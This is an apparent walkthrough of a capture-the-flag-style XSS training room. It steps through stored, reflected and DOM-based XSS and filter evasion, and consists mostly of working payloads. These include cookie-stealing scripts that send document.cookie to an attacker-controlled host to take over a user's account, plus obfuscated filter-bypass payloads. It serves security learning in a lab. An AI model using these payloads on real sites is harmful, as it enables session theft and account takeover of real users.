****Updated on 23/07/20 I can solve last task now thanks to Papadopejk****
****This room is broken on Task#8****
[Task 1] Introduction
[Task 2] Deploy your XSS Playground
[Task 3] Stored XSS
- The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine.
2. Add a comment and see if you can insert some of your own HTML. Doing so will reveal the answer to this question.
I used payload from:
<img src=x onerror=alert('XSS');>
3. Create an alert popup box appear on the page with your document cookies.
<script>alert(document.cookie);</script>
4. Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.
Right click -> Inspect Element
Element id is “thm-title”.
I used this as a reference to edit string:
Let’s try it in browser’s console.
document.getElementById('thm-title').innerHTML="test";
It’s work.
Let’s inject the script
<script>document.getElementById('thm-title').innerHTML="I am a hacker";</script>
5. Stored XSS can be used to steal a victims cookie (data on a machine that authenticates a user to a webserver). This can be done by having a victims browser parse the following Javascript code:
<script>window.location=’http://attacker/cookie='+document.cookie</script>
This script navigates the users browser to a different URL, this new request will includes a victims cookie as a query parameter. When the attacker has acquired the cookie, they can use it to impersonate the victim.
Take over Jack’s account by stealing his cookie, what was his cookie value?
I always use Burp Suite’s sitemap to log site.
Access logs.
Maybe I can redirect Jack’s cookie here. Let’s click it.
There’s a log appeared.
Back to Stored XSS. Let’s put the script
<script>document.location='http://<ip>/log/'+document.cookie</script>
Back to /logs/ , refresh the page.
6. Post a comment as Jack.
Change the value to Jack’s and refresh. You will get the answer.
[Task 4] Reflected XSS
- Craft a reflected XSS payload that will cause a popup saying “Hello”
<script>alert("Hello")</script>
You can see that there’s a request.
2. Craft a reflected XSS payload that will cause a popup with your machines IP address.
<script>alert(window.location.hostname)</script>
[Task 5] DOM-Based XSS
- Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
Let’s test it.
test" onmouseover="alert('Hover over the image and inspect the image element')"
Let’s “onmouseover” it. It’s work.
Let’s exploit it.
test" onmouseover="alert(document.cookie)"
2. Create an onhover event on an image tag, that change the background color of the website to red.
test" onhover="document.body.style.backgroundColor = 'red';
Nothing happened
Let’s try on mouse over.
test" onmouseover="document.body.style.backgroundColor = 'red';
[Task 6] Using XSS for IP and Port Scanning
[Task 7] XSS Keylogger
[Task 8] Filter Evasion
- Bypass the filter that removes any script tags.
<img src=x onerror=alert('Hello');>
2. The word alert is filtered, bypass it.
<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,72,101,108,108,111,39,41))";>
No flag. I think this room is broken.
****Update: I tried this payload.
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
3. The word hello is filtered, bypass it.
— Same script as #2.
****Update: I tried this payload.
<object onerror=alert('Hello')>
4. Filtered in challenge 4 is as follows:
- word “Hello”
- script
- onerror
- onsubmit
- onload
- onmouseover
- onfocus
- onmouseout
- onkeypress
- onchange
I used payload from portswigger:
Let’s test the payload first
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
Let’s exploit
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="eval(String.fromCharCode(97,108,101,114,116,40,39,72,101,108,108,111,39,41))"></xss>
Success!!!
****Update: I tried this payload.
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>